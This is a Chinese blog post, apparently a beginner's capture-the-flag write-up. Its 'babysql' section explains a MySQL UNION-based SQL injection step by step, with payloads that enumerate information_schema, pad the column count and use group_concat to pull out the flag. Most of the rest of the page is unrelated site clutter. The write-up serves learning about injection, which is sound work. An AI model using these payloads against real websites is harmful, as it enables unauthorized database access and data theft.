Geek 学习

已于 2022-10-08 16:54:59 修改
阅读量603 收藏
点赞数 1
文章标签: 数据库
于 2022-10-08 16:42:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JIN_7X/article/details/121630393
版权

Web

Dark

暗网,正常比赛不出,跳

Welcome2021

F12 Network 刷新,现在进不去了不知道咋写

babysql

以前没接触过sql注入,所以从头学。
sql基本语法:https://kodosan.com/359.html

联合查询注入的原理就是在语句select … from … where …=uname中先用随便什么值加个引号(因为uname用户名正常情况下是字符串)把前边的语句结束了(如’-1’),然后在后面接上一堆自己想用的sql查询命令。但sql查个东西都得指定是哪个数据库哪个表哪列(列倒是能直接用*),我咋知道有啥数据库有啥表。不过MySQL他有一个叫information_schema的数据库,里边把数据库名表名列名(或许应该叫字段?)都写出来的。所以开始就用这个语句查一下都有啥数据库:

SELECT schema_name from information_schema.SCHEMATA

然而这是个联合注入,不是直接查询,所以得打开harkbar,先乱输点啥用户名和密码提交,然后loadurl看看链接里有没有uname和pwd。要没有那就是post发的,打开post data再点loadurl就有了。之后我们就可以在uname=后边输上联合查询形式的上边的语句。别忘了把后边的引号注释掉要加#或者-- -或者-- +

uname=-1' UNION SELECT schema_name from information_schema.SCHEMATA#&pwd=1

然后你就傻了,因为他报错了。

为啥捏,因为这个联合查询吧他要求你前边查几列后边就得查几列。我前边就是啥都没查到你也得跟着我几列就是几列。那没招,一列一列的加。你会发现加到第四列就不报错了。

uname=-1' UNION SELECT schema_name,2 from information_schema.SCHEMATA#&pwd=1
uname=-1' UNION SELECT schema_name,2,3 from information_schema.SCHEMATA#&pwd=1
uname=-1' UNION SELECT schema_name,2,3,4 from information_schema.SCHEMATA#&pwd=1

弹出的窗口上显示

your uname:information_schema and your pwd:2

然后你又傻了。

为啥捏,因为你就查到了一个information_schema,这不搁着搁着呢吗?

其实真正原因是,他就给你显示了一行。那咋办捏,不急,我们可以用group_concat把这列所有行挤到第一行里去.

uname=-1' UNION SELECT group_concat(schema_name),2,3,4 from information_schema.SCHEMATA#&pwd=1

uname:information_schema,performance_schema,test,mysql,flag,babysql and your pwd:2

然后我们就能看到一个叫flag的数据库,那就继续到information_schema.tables里去找flag数据库里有哪些表。

uname=-1' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema='flag'#&pwd=1

your uname:fllag and your pwd:2

这里table_schema是tables里的一个字段,表示这行的表是哪个数据库的。

继续查

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema='flag' and table_name='fllag'#&pwd=1

显示

your uname:fllllllag,wlz and your pwd:2

那现在数据库名表名列名都知道了,直接查fllllllag里看看有啥

uname= -1' union select group_concat(fllllllag),2,3,4 from flag.fllag#&pwd=1

显示

your uname:SYC{U_4N0vv_Sql_Noyv~} and your pwd:2

babyPOP

ScyCree
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
cad卸载不干净_一款极其好用的卸载神器:Geek Uninstaller,再也不怕软件卸载不干净!...
weixin_39585795的博客
10-27 2310
由于微信推送机制改版,为了防止大家错过大飞鸽的消息,希望大家手动将大飞鸽的公众号添加到 “星标⭐”,感谢大家对大飞鸽的厚爱~~~大家好,大飞鸽就是我,我就是大飞鸽,今天大飞鸽给大家推荐一款电脑软件卸载神器!解决电脑软件卸载残留问题。这款应用就是他,Geek Uninstaller!1 软件介绍 Geek Uninstaller是一个免费的专业的卸载软件,采取深而快的扫描方式,删除...
geek学习 有空就学习一点啦
04-23
"Geek学习,有空就学习一点啦"这个标题无疑是在鼓励我们利用闲暇时间充实自己,尤其是对于像SQL和Java这样的核心编程语言。SQL(结构化查询语言)是数据库管理的基础,而Java则是一种广泛使用的面向对象的编程语言。...
【卸载神器——Geek】的下载安装使用教程
热门推荐
Thanks_ks的IT探秘之旅
11-25 10万+
本文主要介绍了一款名为geek的卸载软件的下载安装使用方法,并提供了对应的软件网盘链接供使用。
CSDN极客头条使用指南
weixin_34168700的博客
07-26 2168
CSDN极客头条使用指南 今天给大家介绍一下CSDN博客最新推出的这个栏目——CSDN极客头条。 极客头条是什么 极客头条大家分享优质IT资源的聚集地。大家不仅可以分享CSDN的文章,更可以将其他社区的好的文章,在CSDN极客头条这个平台上让更多的开发者知晓。利用CSDN的巨大影响力,让这些优质博文能够获得更多的关注。 互联...
强力卸载工具——geek
最新发布
weixin_73483158的博客
05-21 473
geek是一款便捷的强力卸载工具。
Windows卸载与清除工具 Geek
久绊A的博客
01-27 5883
Windows卸载与清除工具 “ Geek 与 CCleaner ”geek是一款专业的Windows软件卸载软件,它可以卸载程序并查找以前卸载的应用程序在注册表中留下的点点滴滴,彻底地卸载干净,还用户一个干净整洁的电脑。CCleaner是一款系统优化和隐私保护工具,可以对文件夹、历史记录、回收站等进行垃圾清理,并可对注册表进行垃圾项扫描、清理。进入CCleaner界面,根据自己的需求,进行设置。2、打开官网,选择合适的进行下载。
Geek
jf389180247的博客
08-03 194
Geek
Geek Geek Geek
04-30
2. 持续学习Geek文化强调不断学习新技术和新工具,以便适应快速发展的科技环境。他们热衷于阅读技术博客、参加在线课程、参与开源项目,以保持对最新技术的敏锐度。 3. 解决问题的能力:Geek们善于分析问题,找到...
geek uninstaller
08-19
3. **实时日志查看**:在卸载过程中,Geek Uninstaller会记录所有操作,用户可以随时查看这些日志,了解软件卸载的详细过程,这对于排查问题和学习卸载原理非常有帮助。 4. **简洁界面**:该软件界面直观易用,用户...
Geek4Geeks
03-20
《极客4极客——深度探索...总之,"Geek4Geeks"是Java学习者的宝库,无论你是初学者还是经验丰富的开发者,都能在这里找到有价值的学习资源。通过深入学习和实践,你将能够驾驭Java这门强大的语言,成为真正的"极客"。
geek_Django
03-29
综上所述,"geek_Django"可能涵盖了Django框架的基本使用和CSS设计技巧,学习者可以通过该项目或教程深入了解这两方面的知识,提升自己的web开发技能。无论是对Django的高级特性如中间件、自定义管理命令的探索,...
geek(windows卸载软件工具)
07-09
Geek是款好用的专业的卸载清理工具,此款软件采取的是深度又快速的扫描方式,清理掉电脑不常用的软件和多余的垃圾,让你的电脑磁盘更加干净运行速度更快,Geek能够完美支持支持32位与64位系统,可以强制彻底清除软件残留垃圾文件或是查看某软件的注册表项目等,能够保证卸载无残留,系统运行速度也不会有丝毫下降,非常实用!
超好用的卸载工具——geek(免安装)
04-18
Geek是款好用的专业的卸载清理工具,此款软件采取的是深度又快速的扫描方式,清理掉电脑不常用的软件和多余的垃圾,让你的电脑磁盘更加干净运行速度更快,Geek能够完美支持支持32位与64位系统,可以强制彻底清除软件残留垃圾文件或是查看某软件的注册表项目等,能够保证卸载无残留,系统运行速度也不会有丝毫下降,非常实用!
geek的安装包
05-25
这是一个geek的软件包!!!!感兴趣的同学请自行下载!!卸载软件非常干净
geek应用程序
10-28
本程序可以对注册表及应用程序的所有文件及信息的删除和安装
geek64.exe
06-21
无广告,免安装的卸载工具,能够自动清理注册表和顽固信息,还提供强制卸载,删除静态文件+清理注册表
超好用的卸载软件 —— Geek
qq_48795733的博客
12-01 9784
手把手教你 Geek 的安装、如何使用 Geek
程序员Geek资源(工具/网站)
编程架构三分天下:分层、分治、分时序。
07-13 1389
程序员Geek资源,包括在线工具 网站等
geek-客户端都有哪些不常见但是很高级的功能?
m0_37047995的博客
04-06 165
而Flume中的拦截器也是同理,它们插入的逻辑可以是修改待发送的消息,也可以是创建新的消息,甚至是丢弃消息。在上面的消费者拦截器中,我们在真正消费一批消息前首先更新了它们的总延时,方法就是用当前的时钟时间减去封装在消息中的创建时间,然后累计得到这批消息总的端到端处理延时并更新到Redis中。从技术上来说,我们可以在客户端程序中增加这样的统计逻辑,但是对于那些将Kafka作为企业级基础架构的公司来说,在应用代码中编写统一的监控逻辑其实是很难的,毕竟这东西非常灵活,不太可能提前确定好所有的计算逻辑。
深度学习技术详解:前馈、卷积与循环网络
"这篇论文是深度学习领域的一个技术性介绍,涵盖了深度神经网络(DNN)的三个核心组件:前馈神经网络、卷积神经网络(CNN)和循环神经网络(RNN)。它深入探讨了这些网络的结构、工作原理以及优化算法。论文中包含了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ScyCree

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值